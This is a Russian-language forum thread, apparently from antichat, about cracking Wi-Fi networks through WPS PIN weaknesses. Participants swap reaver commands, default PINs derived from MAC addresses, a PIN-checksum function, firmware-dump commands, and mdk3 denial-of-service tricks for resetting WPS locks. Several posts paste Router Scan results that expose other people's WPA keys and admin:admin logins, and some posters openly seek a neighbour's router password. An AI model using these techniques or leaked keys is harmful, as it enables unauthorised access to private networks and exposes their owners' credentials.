PDA

Просмотр полной версии : Уязвимость в протоколе Wi-Fi Protected Setup


Страницы : 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20

Algierd
27.12.2014, 01:01
С этим помочь не могу.

А с предыдущим попробуйте:

reaver -i mon0 -b 34:08:04C:5A:18 -vv -p4440984 -n -L



Сегодня роутер включил wps. После блокировки две последних цифры мака изменились, вместо 34:08:04C:5A:18 стало 34:08:04C:5A:F8 (раньше не обращал внимание). Сгенерировал новый пин, ввёл команду выше, а результат всё тот же: пин успешно подошёл, а строки с паролем нет... Какие ещё есть мысли по этому роутеру?

TOX1C
27.12.2014, 01:05
подключиться с помощью пин-кода средствами винды или телефона с андроидом. а там уже подглянуть пароль в веб морде. это если пин-код действительно подходит.

Algierd
27.12.2014, 01:07
подключиться с помощью пин-кода средствами винды или телефона с андроидом. а там уже подглянуть пароль в веб морде. это если пин-код действительно подходит.



А как узнать подходит или нет? Полный перебор останавливается на этом пине, типа успешно завершено. Но по нему не подключает к данной ТД.

henri2002
27.12.2014, 01:10
А как узнать подходит или нет? Полный перебор останавливается на этом пине, типа успешно завершено. Но по нему не подключает к данной ТД.



логи ривера выставите.

Algierd
27.12.2014, 01:28
логи ривера выставите.



Выставлял уже:

https://www.sendspace.com/file/q0cr31

в 5 раз прогонять заново не вижу смысла.

binarymaster
27.12.2014, 01:34
to binarymaster

Huawei EchoLife HG532e в программке не определяется (24bit HEX->DEC)



Добавил OUI-шки.

Пост вот тут (чтобы не искать).



есть asus rt-n12 c1

bssid:50:46:5D:61:C1:58

известный pin:42805878

к соожалению,метод не сработал...хотя,может так только в моем случае



Как уже выяснилось, в большинстве случаев этот алгоритм используется на ASUS RT-N13U Rev.B1

Но надо будет ещё посмотреть.



А вот есть ли какой-то список маков всех роутеров которые используют генерацию пина по методу 16>10 ?



В генераторе пинов я назвал этот алгоритм NIC-24.

Algierd
27.12.2014, 02:53
В генераторе пинов я назвал этот алгоритм NIC-24.



С TP-Link'ами я так понял пока засада? А что насчёт роутеров ZTE (их клон Промсвязь) ? У нас их много встречается у абонентов byfly.

binarymaster
27.12.2014, 04:33
С TP-Link'ами я так понял пока засада?



Пока да.



А что насчёт роутеров ZTE (их клон Промсвязь) ? У нас их много встречается у абонентов byfly.



Если речь идёт о роутере "Промсвязь M-200 A", то он использует прошивку ZyNOS, там свои особенности пин кода.

Прошивка поддерживается Router Scan'ом, если есть возможность, соберите хорошую выборку из этих роутеров, чтобы можно было проанализировать.

asdm
28.12.2014, 16:10
Address: http://10.59.2.121:8080/

Time: 16 ms

Authorization: admin:admin

Device: Sercomm Beeline Smart Box S1000

BSSID: D4:21:22:0B:A8:F8

ESSID: Smart_box-Fast

Security type: WPA/WPA2

Key: Fast7137767

WPS Pin: 12996209

LAN IP: 192.168.1.1

LAN Subnet Mask: 255.255.255.0

WAN IP: 10.59.2.121

WAN Gateway: 10.59.0.1

Domain Name Servers: 85.21.192.3 213.234.192.8

странно,в одном порт 80,в другом 8080,хотя роутер один и тот же

http://i66.fastpic.ru/big/2014/1228/6a/9af42ce84e00a857657057c7e884fd6a.png

binarymaster
28.12.2014, 16:25
странно,в одном порт 80,в другом 8080,хотя роутер один и тот же



Просто он слушает 2 порта одновременно, такое бывает.

asdm
28.12.2014, 17:09
вот еще один,здесь bssid с 00:0e:8f начинается

Address: http://10.59.73.176/

Time: 15 ms

Authorization: admin:admin

Device: Sercomm Beeline Smart Box S1000

BSSID: 00:0E:8F:06:BC:A6

ESSID: Saloem

Security type: WPA/WPA2

Key: 7175491qwe

WPS Pin: 23397705

LAN IP: 192.168.1.1

LAN Subnet Mask: 255.255.255.0

WAN IP: 10.59.73.176

WAN Gateway: 10.59.72.1

Domain Name Servers: 213.234.192.8 85.21.192.3

Sitronik
28.12.2014, 19:27
Пока да.

Если речь идёт о роутере "Промсвязь M-200 A", то он использует прошивку ZyNOS, там свои особенности пин кода.

Прошивка поддерживается Router Scan'ом, если есть возможность, соберите хорошую выборку из этих роутеров, чтобы можно было проанализировать.



Меня тоже интересует этот вопрос, потому что ни одна точка "ZTE от Укртелекома" не поддается взлому по wps сразу в блок идут, помогите пожалуйста узнать метод генерации пин-кодов. Сделал выборку по роутерам ZTE крупного провайдера Укртелеком.

ZTE.xls

TOX1C
28.12.2014, 21:59
у модемов zte от укртелекома впс как такового на родной прошивке нет. там работает только кнопка, один человек уже проверял, покупал этот роутер и долбил его ривером. Если бы кто развертел алгоритм создания стандартного пароля, вот это было бы интереснее, тем более жопой чувствую, что в прошивке можно найти много чего интересного

binarymaster
28.12.2014, 22:24
вот еще один,здесь bssid с 00:0e:8f начинается

ESSID: Saloem



Поднять репу пока не получается, спасибо за точку

http://rghost.ru/60026941/thumb.png

asdm
28.12.2014, 22:53
http://rghost.ru/60026941/thumb.png


сосед,вот уж не думал из бутово здесь кого-нибудь встречу

binarymaster
29.12.2014, 00:05
Мир так тесен

VladimirV
29.12.2014, 00:14
nic->24

Самые последнии!

http://rghost.ru/private/60028972/c61036f3b4ffacdb0cb237fd21a761b7

Еще нашол много статики. Позже выложу.

binarymaster
29.12.2014, 00:41
На будущее:

Подписывай, какой мак-адрес соответствует какой модели, а то не всегда очевидно...

А так, плюс)

VladimirV
29.12.2014, 11:43
Вот собрал все (в конце файла):

http://rghost.ru/private/60034011/a147815be273a11786a09e007f579ab8

P.S. Если модели нет - Значит это не роутерскан а я через reaver подобрал.

RomanxD
29.12.2014, 14:11
Вот собрал все (в конце файла):

http://rghost.ru/private/60034011/a147815be273a11786a09e007f579ab8

P.S. Если модели нет - Значит это не роутерскан а я через reaver подобрал.



//24 ================== раскидано все и кажись много повторов.

VladimirV
29.12.2014, 14:36
//24 ================== раскидано все и кажись много повторов.



То так задумано Это две колонки таблицы.

Актуально ALL.

Для алгоритмов 24, 28, 32 если совпала первая половина пина значит алгоритм правильный (роутерскан в некоторых роутерах не правильно парсит последний байт BSSID) в жывую все OK.

binarymaster
29.12.2014, 17:28
Вот собрал все (в конце файла):

http://rghost.ru/private/60034011/a147815be273a11786a09e007f579ab8

P.S. Если модели нет - Значит это не роутерскан а я через reaver подобрал.



В файле:

50:46:5D:12:XX:XX 32B BinaryMaster
Хм... я не патчу роутеры

VladimirV
29.12.2014, 17:34
В файле:

50:46:5D:12:XX:XX 32B BinaryMaster
Хм... я не патчу роутеры


Это я записывал и забыл удалить

Sitronik
29.12.2014, 20:50
у модемов zte от укртелекома впс как такового на родной прошивке нет. там работает только кнопка, один человек уже проверял, покупал этот роутер и долбил его ривером. Если бы кто развертел алгоритм создания стандартного пароля, вот это было бы интереснее, тем более жопой чувствую, что в прошивке можно найти много чего интересного



Жаль конечно что впс там не работает вся надежда на ачат )) Может выложить прошивку пусть кто хорошо разбирается глянет, вдруг решат эту проблемку?

VladimirV
29.12.2014, 22:08
Жаль конечно что впс там не работает вся надежда на ачат )) Может выложить прошивку пусть кто хорошо разбирается глянет, вдруг решат эту проблемку?



Можно в личку. Глянем.

Algierd
30.12.2014, 17:46
ESSID: ZTE018

BSSID: CC:7B:35:15:F5:78

лог ривера:

https://www.sendspace.com/file/chj9yk

Несколько раз делал полный перебор, где-то в начале, но с разных мест, показывает прогресс 90%, потом доходит до 99,99% и так по кругу гоняет один пин... С этим можно что-нибудь сделать чтобы вытянуть пароль?



Нашёлся ещё один роутер который ведёт себя аналогичным образом, мак-адреса у них совпадают:

ESSID: ZTE154

BSSID: CC:7B:35:15:40:5C

может у кого будут предложения?

plab
30.12.2014, 19:20
Нашёлся ещё один роутер который ведёт себя аналогичным образом, мак-адреса у них совпадают:

ESSID: ZTE154

BSSID: CC:7B:35:15:40:5C

может у кого будут предложения?



У этих новых zte pin не вычислишь.

Algierd
30.12.2014, 19:49
У этих новых zte pin не вычислишь.



Как хотя бы их взломать по wps?

TOX1C
30.12.2014, 20:49
А у них вообще пин-код есть?

Algierd
30.12.2014, 20:59
А у них вообще пин-код есть?



Перебор идёт, но ривер гоняет один пин по кругу на 99,99%, причём с каждого нового перебора спотыкается в разных местах

TOX1C
30.12.2014, 21:07
Я имею в виду, у роутеров видно пин-код в веб-интерфейсе виден, и есть ли поддержка по пинку в прошивке. Возможно, с этими роутерами такая же песня, как и с укртелекомовскими гривневыми модемами.

Algierd
30.12.2014, 21:24
Я имею в виду, у роутеров видно пин-код в веб-интерфейсе виден, и есть ли поддержка по пинку в прошивке. Возможно, с этими роутерами такая же песня, как и с укртелекомовскими гривневыми модемами.



Хз. У меня таких три штуки рядом и ни один не удалось сломать брутом по словарю чтобы зайти и слить прошивку... При переборе wps он ещё постоянно выдаёт Warning: Receive timeout occurred хотя сигнал там просто отличный. Скрин:

http://images.vfl.ru/ii/1419960416/8dc0a4d9/7337890_s.png

TOX1C
30.12.2014, 21:40
Warning: Receive timeout occurred



Ну это у меня постоянно при переборе выбивает, походу так и должно быть. При этом пин-код успешно подбирается, перебор идет.

пысы посмотри прогой dumpper, что там за роутер, возможно удастся найти дамп флешки.

Algierd
30.12.2014, 22:11
Ну это у меня постоянно при переборе выбивает, походу так и должно быть. При этом пин-код успешно подбирается, перебор идет.

пысы посмотри прогой dumpper, что там за роутер, возможно удастся найти дамп флешки.



Кроме версии WPS 1.0 больше ничего не показывает...

Algierd
30.12.2014, 22:29
Погуглил. Из тех роутеров которые использует byfly есть две модели с именем ZTE в названии:

ZTE ZXV10 W300 и Промсвязь ZTE ZXHN H208N

видимо в сторону этих двух моделей и нужно копать...

TOX1C
30.12.2014, 23:01
В веб морде этих модемов нет ни слова об wps, значит и по пину не подключиться к ним. С нашими модемами та же история.

Algierd
30.12.2014, 23:07
Да точно CC:7B:35:15 это ZXHN H208N, wps у него не видно

Algierd
30.12.2014, 23:47
Свежая версия прошивки от них лежит здесь:

http://fw.byfly.me/ims/zxhn-h208n/

а кто подскажет как из этого роутера выдернуть его ром?

TOX1C
31.12.2014, 00:02
как из этого роутера выдернуть его ром?



Берешь паяло, выпаиваешь из модема микросхему флеш-памяти, делаешь самопальный программатор, и выдергиваешь из него инфу, все просто)

Algierd
31.12.2014, 00:10
Берешь паяло, выпаиваешь из модема микросхему флеш-памяти, делаешь самопальный программатор, и выдергиваешь из него инфу, все просто)



Да, точно А через веб-интерфейс никак?

TOX1C
31.12.2014, 00:21
Никак. Иногда можно по кускам вычитать память через телнет, но это очень редко где есть.

Можно спросить на форумах мастеров по бытовой технике, чтобы те слили дамп флешки.

binarymaster
31.12.2014, 01:03
nvram show
cat /dev/mtd0
cat /dev/mtd1
cat /dev/mtd2
cat /dev/mtd3
Или какие там ещё варианты...

PSYDRUGS
04.01.2015, 14:51
Удалось узнать дефолтный пин для роутера Beeline Smart Box, c MAC: адресом 00:0E:8F:6E:1F:26, это 26129273.

В роутерах ASUS возможно вычислить PIN? С таким MAC: AC:9E:17:30:7B:20, модель RT-N14, лочиться после одной попытки на ~ 300 секунд,

потом отвисает, перебор возможен, но очень долго. И ещё один MAC: 14A:E9:BA:37:94, без понятия что это ASUS или TP-LINK.

VladimirV
07.01.2015, 03:22
И ещё один MAC: 14A:E9:BA:37:94, без понятия что это ASUS или TP-LINK.



ASUS RT-G32

ramosua
07.01.2015, 21:38
Уже здесь упоминали мак 64:66:В3:ХХ:ХХ:ХХ

помогите с пином к Tp-Link

64:66:B3:46:23:12

VladimirV
08.01.2015, 01:05
Уже здесь упоминали мак 64:66:В3:ХХ:ХХ:ХХ

помогите с пином к Tp-Link

64:66:B3:46:23:12



ZyNOS ADSL (TD-W8961ND)

elepol61
08.01.2015, 01:46
Уже здесь упоминали мак 64:66:В3:ХХ:ХХ:ХХ

помогите с пином к Tp-Link

64:66:B3:46:23:12



WPS PIN: 45964985

Sitronik
08.01.2015, 02:40
WPS PIN: 45964985



Как узнать пин от TP-LINK с похожим маком?

elepol61
08.01.2015, 09:16
Как узнать пин от TP-LINK с похожим маком?



- для TP-LINK никак, это всего лишь вероятность что такой пин может подойти полученный при переводе последних шести символов мака из hex в dec.

- дли Zyxel почти всегда такой метод подходит.

kosmaty
08.01.2015, 10:59
Сейчас попробовал на одном подопечном типилинке. Метод работает, но с маленьким нюансом: при переводе последних 6 символов МАС-а в DEC получилось 9789708, а в роутере дефолтный пин 97897088 - один знак в конце отличия, но вцелом, можно говорить о том, что метод рабочий. Для ривера и роутеров, уходящих в лок поле 10 переборов - исключительно замечательный вариант - ввести известные символы, надеяться, что за 10 попыток ривер выведает недостающий и сдаст WPA ключ.

P.S. На 3-х других не прокатило Жаль. Прросто совпало, а может, от процессора зависит. Не знаю.

elepol61
08.01.2015, 13:24
Сейчас попробовал на одном подопечном типилинке. Метод работает, но с маленьким нюансом: при переводе последних 6 символов МАС-а в DEC получилось 9789708, а в роутере дефолтный пин 97897088 - один знак в конце отличия, но вцелом, можно говорить о том, что метод рабочий. Для ривера и роутеров, уходящих в лок поле 10 переборов - исключительно замечательный вариант - ввести известные символы, надеяться, что за 10 попыток ривер выведает недостающий и сдаст WPA ключ.

P.S. На 3-х других не прокатило Жаль. Прросто совпало, а может, от процессора зависит. Не знаю.



- последняя восьмая цифра в пин коде называется - контрольная сумма, она как раз в твоём случае и равняется 8.

- повезло, конечно пробовать надо может и прокатит.

Vikhedgehog
08.01.2015, 13:27
Сейчас попробовал на одном подопечном типилинке. Метод работает, но с маленьким нюансом: при переводе последних 6 символов МАС-а в DEC получилось 9789708, а в роутере дефолтный пин 97897088 - один знак в конце отличия, но вцелом, можно говорить о том, что метод рабочий. Для ривера и роутеров, уходящих в лок поле 10 переборов - исключительно замечательный вариант - ввести известные символы, надеяться, что за 10 попыток ривер выведает недостающий и сдаст WPA ключ.

P.S. На 3-х других не прокатило Жаль. Прросто совпало, а может, от процессора зависит. Не знаю.



Этот способ работает только на роутерах ADSL от TP-LINK, которых в России очень мало.

kosmaty
08.01.2015, 14:34
- последняя восьмая цифра в пин коде называется - контрольная сумма, она как раз в твоём случае и равняется 8.

- повезло, конечно пробовать надо может и прокатит.



А как она вычисляется?

binarymaster
08.01.2015, 15:50
А как она вычисляется?





function wps_pin_checksum(pin)
{
var accum = 0;
while (pin) {
accum += 3 * (pin % 10);
pin /= 10;
pin = Math.floor(pin);
accum += pin % 10;
pin /= 10;
pin = Math.floor(pin);
}
return (10 - accum % 10) % 10;
}

kosmaty
08.01.2015, 16:19
Т.е. простенький скриптик на С скомпилить и исполнить?

binarymaster
08.01.2015, 16:50
Эта функция вычисляет последнее число (контрольную сумму) из исходного пин кода. И она в общем-то не сложная. В reaver последнее число пин кода можно не подставлять, он сам вычисляет.

chingizbel
09.01.2015, 21:55
1. Скажите у роутеров ROSTELECOMа есть алгоритм для пинов или как там дела обстоят ?

2. Если это возможно , то для анализа сколько нужно насобирать роутеров количество, 2-3к или больше ?

Роутерскан их находит

VladimirV
09.01.2015, 23:00
1. Скажите у роутеров ROSTELECOMа есть алгоритм для пинов или как там дела обстоят ?

2. Если это возможно , то для анализа сколько нужно насобирать роутеров количество, 2-3к или больше ?

Роутерскан их находит



У ROSTELECOMа зависит от модели роутера. Есть постоянные пины и 24bit->Hex->Dec

Вот те что мне извесны:


00:1A:A9:B4:XX:XX 1562469 =1562469 Micro DSL (AR800 | V1.5)
00:1A:A9:C9:XX:XX 2017252 =2017252 Micro DSL (AR800 | V1.5)
00:1A:A9:B9:XX:XX 1708421 =1708421 Micro DSL (AR800 | V1.5)
7C:03:4C:CB:XX:XX 1110582 =1110582 Micro DSL (F@ST3804R | 7.126 F3804R RTC)
00:1A:A9:CA:XX:XX 1881172 =1881172 Micro DSL (AR800 | V1.5)
00:1A:A9:B7:XX:XX 2017252 =2017252 Micro DSL (AR800 | V1.5)
00:1F:CE:58:XX:XX 1883648 =1883648 Micro DSL (96328A-1341N1 | A731-406QTH-C01 R06.A2pD033.d23e)
00:1F:CE:47:XX:XX 1562469 =1562469 Micro DSL (96328A-1341N1 | A731-406QTH-C01 R05.A2pD033.d23e)
14:14:4B:0D:XX:XX 1416980 =1416980 Micro DSL (AR800 | V1.5)
00:1F:CE:56:XX:XX 1562469 =1562469 Micro DSL (96328A-1341N1 | A731-406QTH-C01 R06.A2pD033.d23e)
14:14:4B:8B:XX:XX 1881172 =1881172 Micro DSL (AR800 | V2.5)
14:A9:E3:03:XX:XX 0224296 24B ROSTELECOM RT-V4L1USBn, NDMS v1.10(0637)01RU
EC:43:F6:09:XX:XX 0632576 24B Rostelecom 1W4L1USBn, NDMS v2.00(AABV.5)A5-31-5779231

chingizbel
09.01.2015, 23:31
VladimirV

Поглядел я на ваши МАКи , но не знаю что за роутеры эти.

Возможно вы меня не поняли, я имел ввиду роутеры меня интересуют такие :

18:62:2C:FB:9E:B5 ROSTELECOM_9EB4

18:62:2C:FB:81:67 ROSTELECOM_8166

18:62:2C:FC:0F:AC ROSTELECOM_0FAB

68:15:90:4E:1A:57 ROSTELECOM_1A56

68:15:90:4C:8B:CE ROSTELECOM_8BCD

34:8A:AE:13:56:22 ROSTELECOM_5621

34:8A:AE:13:4F:8F ROSTELECOM_4F8E

F0:82:61:4C:BD:15 ROSTELECOM_BD14

F0:82:61:22:BB:5B ROSTELECOM_BB5A

2C:39:96:A9:A5:94 ROSTELECOM_A593

2C:39:96:99:4B:51 ROSTELECOM_4B50

и т.д

Меня интересует мак 68:15:90 т.к у соседа такой роутер , а пасс не знаю (

Сегодня начал собирать базу что роутерскан находит, потом выложу как подкоплю

Zevin
10.01.2015, 13:01
Подскажите пин на F8:1A:67:7E:F6:9A

Wirexia
11.01.2015, 16:41
Сбой реавера или смена пароля

Вообщем читал я что писали тут форумчане по поводу остановки на 99.99% и у меня оказался довольно интересный случай,вообщем реавер по началу затупил на пинкоде 99985677 вот было 90.0% я попробовал заного перебрать вторую часть теперь он остановился на 99.9% с пинкодом 99989989 и все,поменял 8 на 9 в первой части пароля и сного подбираю 2 часть,как только начал её подбирать увидел что все опять с 90.0% началось....что делать то? Могли ли сменить пароль на точке во время моего перебора??

4pips
11.01.2015, 17:06
Могли ли сменить пароль на точке во время моего перебора??



Речь о пине, а не о пароле. Да, могли сменить пин, но вероятность очень небольшая. Например на устройствах tp-link можно менять пин, но какое там устройство у вас - неизвестно.



...что делать то?



Скорее всего ривер пропустил правильную первую часть пина (первые 4 цифры). Такое бывает когда точка плохо отвечает и ривер ее не понимает. Может это такой вид защиты, но скорее всего просто точка глючно работает. Нужно пробовать снова или пробовать утилиту bully вместо ривер. Например для trendnet, мне кажется, bully лучше подходит.

Wirexia
11.01.2015, 18:56
Речь о пине, а не о пароле. Да, могли сменить пин, но вероятность очень небольшая. Например на устройствах tp-link можно менять пин, но какое там устройство у вас - неизвестно.

Скорее всего ривер пропустил правильную первую часть пина (первые 4 цифры). Такое бывает когда точка плохо отвечает и ривер ее не понимает. Может это такой вид защиты, но скорее всего просто точка глючно работает. Нужно пробовать снова или пробовать утилиту bully вместо ривер. Например для trendnet, мне кажется, bully лучше подходит.




Мне тоже не ясно что за роутер...но только что поменяв цифру в первой части нифига не поменялось теперь ривер завис на коде 99999988....вообщем очень печально что придется все заного подбирать,попробую еще я ваши утилиты,возможно они что изменят))

Еще интересует такой вопрос,у меня имеются 3 точки которые я когда то ломал и они мне дали баны(wps locked Yes) вот можно ли от этого как то избавится,разблокировать эту точку,читал просто на американских форумах по поводу утилиты revdk и ручного метода снятия такого бана,суть способа заключается в том что бы задосить точку и сделать так что бы она перезагрузилась....но толком я мало чего понял и хотелось бы узнать,правда или нет?

sergeich
11.01.2015, 19:40
Подскажите пин на F8:1A:67:7E:F6:9A



[+] WPS pin might be : 83206665

Отпиши подошел ли.

sergeich
11.01.2015, 19:43
Еще интересует такой вопрос,у меня имеются 3 точки которые я когда то ломал и они мне дали баны(wps locked Yes) вот можно ли от этого как то избавится,разблокировать эту точку,читал просто на американских форумах по поводу утилиты revdk и ручного метода снятия такого бана,суть способа заключается в том что бы задосить точку и сделать так что бы она перезагрузилась....но толком я мало чего понял и хотелось бы узнать,правда или нет?



А если просто MAC адрес твоего wi-fi адаптера поменять?

Zevin
11.01.2015, 20:01
[+] WPS pin might be : 83206665

Отпиши подошел ли.


Точка пока пропала из виду

Есть похожая. Судя по всему таже модель

F8:1A:67:59:63:B0

PIN 24727440

Пин 100%, вычислял 2 дня.

Проверьте плиз ваш метод на той точке что я давал ранее.

Wirexia
11.01.2015, 20:41
А если просто MAC адрес твоего wi-fi адаптера поменять?



Незнаю....непробовал)) просто я этот способ изначально знал,догадывался по поводу смены mac но это безсмысленно) потому что точка банит не мой мак а банит подключение по wps так что с какого мака ты бы не подключался в любом случаее будет бан,раньше я сталкивался с баном,но не стаким жестоким(вечность) вот и решил узнать может кто пробовал попытатся сломать wps lock ну илм использовал метод американцев: http://m.youtube.com/watch?v=hHVPSJn4Fqo

Ну или использовал Revdk...просто она у меня не пошла а вручную какой то бред выходит)

TOX1C
11.01.2015, 22:31
Есть похожая. Судя по всему та же модель



Тоже есть похожие

f8:1a:67:64:c8:2a - 21255571

f8:1a:67:75:2a:7a - 65394298

f8:1a:67:80:ca:2e - 69001420

f8:1a:67:e0:80:2a - 17004633

Пины рабочие, получены из веб-морд роутера.

Wirexia
12.01.2015, 02:00
Поломал я сеть...оказался это UR-325BN компании Upvel,пароль сети оказался просто крутым:z7staE2H ну а пинкод 20854836 подобрался очень быстро,сначало до 10% а потом резкий прыжок до 90% и после 2 часть за 30 мин подобрал,все таки ривер пропустил один или более пакет(ов)

Но вопрос по поводу Wps Lock остается в силе

Вездесущий
12.01.2015, 02:17
У меня тоже некоторые точки идут в бан, но после отключения света или с определенным интервалом времени некоторые "регенерируются" и поехали ривером дальше... а некоторые так и до сии висят вялятся, вот как их снять хотя-бы с пином... кстати на некоторых которые вкусно пахнут есть хэндшейк... А вот как убрать Wps Lock досихпор загадка

VladimirV
12.01.2015, 02:33
Поломал я сеть...оказался это UR-325BN компании Upvel,пароль сети оказался просто крутым:z7staE2H ну а пинкод 20854836 подобрался очень быстро,сначало до 10% а потом резкий прыжок до 90% и после 2 часть за 30 мин подобрал,все таки ривер пропустил один или более пакет(ов)

Но вопрос по поводу Wps Lock остается в силе



Это один из постоянных пинов для:

Upvel UR-315BN Wireless Router

Upvel UR-325BN Wireless Router

Думаю если Вы спросили пин к маку то Вам его подсказали.

Wirexia
12.01.2015, 10:22
Это один из постоянных пинов для:

Upvel UR-315BN Wireless Router

Upvel UR-325BN Wireless Router

Думаю если Вы спросили пин к маку то Вам его подсказали.



Причем тут мак и пин?)

Почитайте мои пост еще раз,разве я написал что я взял и спросил у кого то?))) Мрак))))

4pips
12.01.2015, 19:32
Wirexia

Да, возможно VladimirV выразился недостаточно четко для вас. И я слишком мягко интересовался, какое у вас там устройство. Если бы вы сообщили первую половину его мак-адреса (так называемую OUI), то многие бы вам тут ответили, какой пин пробовать.

http://forum.antichat.ru/showthread.php?p=3758902-20854836#post3758902

Но вы самостоятельно нашли этот известный пин. Ведь мог бы быть и не он.

Wirexia
12.01.2015, 22:29
Wirexia

Да, возможно VladimirV выразился недостаточно четко для вас. И я слишком мягко интересовался, какое у вас там устройство. Если бы вы сообщили первую половину его мак-адреса (так называемую OUI), то многие бы вам тут ответили, какой пин пробовать.

http://forum.antichat.ru/showthread.php?p=3758902-20854836#post3758902

Но вы самостоятельно нашли этот известный пин. Ведь мог бы быть и не он.



Мрак,а что то по моему вопросу с WPS locked yes у вас есть?)

4pips
12.01.2015, 23:02
Мрак,а что то по моему вопросу с WPS locked yes у вас есть?)



Если устройства от tp-link, то на некоторых из них можно принудительно перегружать wi-fi модуль (т.е. сбрасывать lock) с помощью mdk3. Не на всех получится, но известны мак-адреса, на которых получалось. Устройства других производителей на mdk3 не реагируют или просто еще не найдены. У некоторых lock временный, у некоторых до перезагрузки. На некоторых устройствах чтобы избежать залочивания, нужно пробовать пин не чаще чем раз в 60 секунд. Задавая вопрос, очень желательно указывать производителя устройства или давать первую половину мак-адреса (OUI). По ней легко узнать производителя, например тут: https://www.wireshark.org/tools/oui-lookup.html

Wirexia
13.01.2015, 17:13
Если устройства от tp-link, то на некоторых из них можно принудительно перегружать wi-fi модуль (т.е. сбрасывать lock) с помощью mdk3. Не на всех получится, но известны мак-адреса, на которых получалось. Устройства других производителей на mdk3 не реагируют или просто еще не найдены. У некоторых lock временный, у некоторых до перезагрузки. На некоторых устройствах чтобы избежать залочивания, нужно пробовать пин не чаще чем раз в 60 секунд. Задавая вопрос, очень желательно указывать производителя устройства или давать первую половину мак-адреса (OUI). По ней легко узнать производителя, например тут: https://www.wireshark.org/tools/oui-lookup.html



E8:94:F6:73:3E:E2 alert_5 (wps locked) (Results

E8:94:F6 TP-LINK TECHNOLOGIES CO.,LTD.)

CO:4A:00:49:A5:06 Tp-Link 1043 (wps locked)

CO:4A:00:5F:88:86 DOMA (wps locked )

Очень бы был признателен вам если подскажите пин или метод снятия wps лока)

Из трех мак адресо только первый я нашел что он тп линк...и то незнаю правильно или нет...

4pips
13.01.2015, 17:42
Буквы О в мак-адресе быть не может, правильно C0:4A:00

У tp-link пины без системы - никто не подскажет (возможно очень давно все же была система, потому встречается крайне редко).

А для снятия лока и подбора нужно запускать скрипт.

Текст скрипта немного раличается в зависимости от того, какой сборкой Linux вы пользуетесь. Наиболее популярные wifislax и Kali. Для них в этой ветке ранее приводились тексты скриптов - можно найти, в крайнем случае кто-нибудь повторит, подскажи название сборки.

Wirexia
13.01.2015, 18:19
Буквы О в мак-адресе быть не может, правильно C0:4A:00

У tp-link пины без системы - никто не подскажет (возможно очень давно все же была система, потому встречается крайне редко).

А для снятия лока и подбора нужно запускать скрипт.

Текст скрипта немного раличается в зависимости от того, какой сборкой Linux вы пользуетесь. Наиболее популярные wifislax и Kali. Для них в этой ветке ранее приводились тексты скриптов - можно найти, в крайнем случае кто-нибудь повторит, подскажи название сборки.




у меня backtrack5 r3 пробовал я md3 долбить эти три точки) пользовался командой md3 интерфейс(использовал mon0,1,2) x 0 -t bssid -n essid -s 500 (по началу 200 использовал)

Исправил и узнал что это все 3 тп линка

E8:94:F6:73:3E:E2 alert_5 (wps locked) (Results

E8:94:F6 TP-LINK TECHNOLOGIES CO.,LTD.)

C0:4A:00:49:A5:06 Tp-Link 1043 (wps locked) TP-Link

C0:4A:00:5F:88:86 DOMA (wps locked ) Tp-Link

а вот модели незнаю да и сама база незнает)

4pips
13.01.2015, 20:44
По ссылке сообщение с двумя скриптами. Первый для wifislax, второй для kali (бывший BackTrack). Чем чётче будут вопросы, тем чётче могут быть ответы. У меня был опыт только в wifislax.

http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082

Wirexia
13.01.2015, 21:49
По ссылке сообщение с двумя скриптами. Первый для wifislax, второй для kali (бывший BackTrack). Чем чётче будут вопросы, тем чётче могут быть ответы. У меня был опыт только в wifislax.

http://forum.antichat.ru/showpost.php?p=3760910&postcount=2082



Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Restored previous session

[+] Waiting for beacon from E8:94:F6:73:3E:E2

[+] Switching mon0 to channel 3

[+] Associated with E8:94:F6:73:3E:E2 (ESSID: alert_5)

[+] Trying pin 88885674

[+] Switching mon0 to channel 1

[+] Switching mon0 to channel 3

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

[+] Trying pin 88885674

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

[+] Trying pin 88885674

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 88885674

[+] Sending EAPOL START request

[!] WARNING: Receive timeout occurred

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x03), re-trying last pin

^C

[+] Session saved.

[+] Mdk3 is working ...

[+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C]

уже 6 раз перезапускал на ctrl+c и ничего

TOX1C
13.01.2015, 22:17
И не будет, этот скрипт не берет тп-линк. Точка тупо залочилась, жди денек, потом можно ещё 10 пинов перебрать(

Wirexia
13.01.2015, 22:36
И не будет, этот скрипт не берет тп-линк. Точка тупо залочилась, жди денек, потом можно ещё 10 пинов перебрать(



Так в том то и дело что она меня забанила на всегда,хотя после того как пробовал этот скрипт вроде пошел подбор и потом уже когда во второй раз все заглохло....

TOX1C
13.01.2015, 22:51
У тп-линков есть такая тема, что после лока можно перебрать ещё 8 пинов, после чего можно отдыхать.

PSYDRUGS
13.01.2015, 22:58
А к ASUS скрипт подойдёт? Уходят в блок на 300-600 сек, в зависимости от модели.

Может есть методика генерации по MAC адресу, или это затея безсмысленна?

4pips
13.01.2015, 23:27
Wirexia

Судя по откликам ривера, он не может связаться с точкой. Нет сообщений о блокировке. Сделайте вот что: посмотрите на каком канале точка, запустите отдельно mdk3 с параметрами из скрипта на 15 секунд, остановите, подождите секунд 30 и снова посмотрите на каком канале работает точка. При успешной перезагрузке wi-fi модуля точка как правило меняет канал.

